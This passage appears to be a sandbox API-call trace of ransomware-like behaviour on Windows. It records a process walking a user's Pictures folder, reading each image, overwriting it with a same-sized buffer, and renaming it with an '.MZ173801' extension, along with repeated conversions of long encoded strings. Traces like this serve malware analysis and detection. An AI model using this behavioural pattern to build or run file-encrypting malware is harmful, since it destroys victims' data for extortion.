jUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.443] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] GetCurrentThreadId () returned 0x1358 [0113.443] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7L1WKCQLeheP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\7l1wkcqlehep.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.444] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.444] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.444] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x10561 [0113.444] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.444] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x10561, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x10561, lpOverlapped=0x0) returned 1 [0113.880] CloseHandle (hObject=0x3f8) returned 1 [0113.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\7L1WKCQLeheP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\7l1wkcqlehep.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.883] WriteFile (in: hFile=0x3f8, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x10561, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x10561, lpOverlapped=0x0) returned 1 [0113.885] CloseHandle (hObject=0x3f8) returned 1 [0113.887] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\7L1WKCQLeheP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\7l1wkcqlehep.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\7L1WKCQLeheP.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\7l1wkcqlehep.jpg.mz173801")) returned 1 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] GetCurrentThreadId () returned 0x1358 [0113.888] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60738ed0, ftCreationTime.dwHighDateTime=0x1d5ede4, ftLastAccessTime.dwLowDateTime=0x291e4990, ftLastAccessTime.dwHighDateTime=0x1d5ec2a, ftLastWriteTime.dwLowDateTime=0x291e4990, ftLastWriteTime.dwHighDateTime=0x1d5ec2a, nFileSizeHigh=0x0, nFileSizeLow=0x24ca, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8nrtvJPSXWSOarKar.png", cAlternateFileName="8NRTVJ~1.PNG")) returned 1 [0113.888] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.888] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\8nrtvJPSXWSOarKar.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8nrtvjpsxwsoarkar.png"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60738ed0, ftCreationTime.dwHighDateTime=0x1d5ede4, ftLastAccessTime.dwLowDateTime=0x291e4990, ftLastAccessTime.dwHighDateTime=0x1d5ec2a, ftLastWriteTime.dwLowDateTime=0x291e4990, ftLastWriteTime.dwHighDateTime=0x1d5ec2a, nFileSizeHigh=0x0, nFileSizeLow=0x24ca)) returned 1 [0113.889] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.889] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.889] GetCurrentThreadId () returned 0x1358 [0113.889] GetCurrentThreadId () returned 0x1358 [0113.889] GetCurrentThreadId () returned 0x1358 [0113.889] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.889] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.890] GetCurrentThreadId () returned 0x1358 [0113.890] GetCurrentThreadId () returned 0x1358 [0113.890] GetCurrentThreadId () returned 0x1358 [0113.890] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8nrtvJPSXWSOarKar.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8nrtvjpsxwsoarkar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.890] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.890] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.890] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x24ca [0113.890] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.890] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x24ca, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x24ca, lpOverlapped=0x0) returned 1 [0113.891] CloseHandle (hObject=0x3f8) returned 1 [0113.891] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\8nrtvJPSXWSOarKar.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8nrtvjpsxwsoarkar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.892] WriteFile (in: hFile=0x3f8, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x24ca, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f9bc*=0x24ca, lpOverlapped=0x0) returned 1 [0113.893] CloseHandle (hObject=0x3f8) returned 1 [0113.894] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\8nrtvJPSXWSOarKar.png" (normalized: "c:\\users\\fd1hvy\\pictures\\8nrtvjpsxwsoarkar.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\8nrtvJPSXWSOarKar.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\8nrtvjpsxwsoarkar.png.mz173801")) returned 1 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] GetCurrentThreadId () returned 0x1358 [0113.895] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88fdf200, ftCreationTime.dwHighDateTime=0x1d5ebf0, ftLastAccessTime.dwLowDateTime=0x7821fe90, ftLastAccessTime.dwHighDateTime=0x1d5ec45, ftLastWriteTime.dwLowDateTime=0x7821fe90, ftLastWriteTime.dwHighDateTime=0x1d5ec45, nFileSizeHigh=0x0, nFileSizeLow=0x4fae, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Bsuy48bD0S.png", cAlternateFileName="BSUY48~1.PNG")) returned 1 [0113.895] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.895] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Bsuy48bD0S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\bsuy48bd0s.png"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88fdf200, ftCreationTime.dwHighDateTime=0x1d5ebf0, ftLastAccessTime.dwLowDateTime=0x7821fe90, ftLastAccessTime.dwHighDateTime=0x1d5ec45, ftLastWriteTime.dwLowDateTime=0x7821fe90, ftLastWriteTime.dwHighDateTime=0x1d5ec45, nFileSizeHigh=0x0, nFileSizeLow=0x4fae)) returned 1 [0113.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE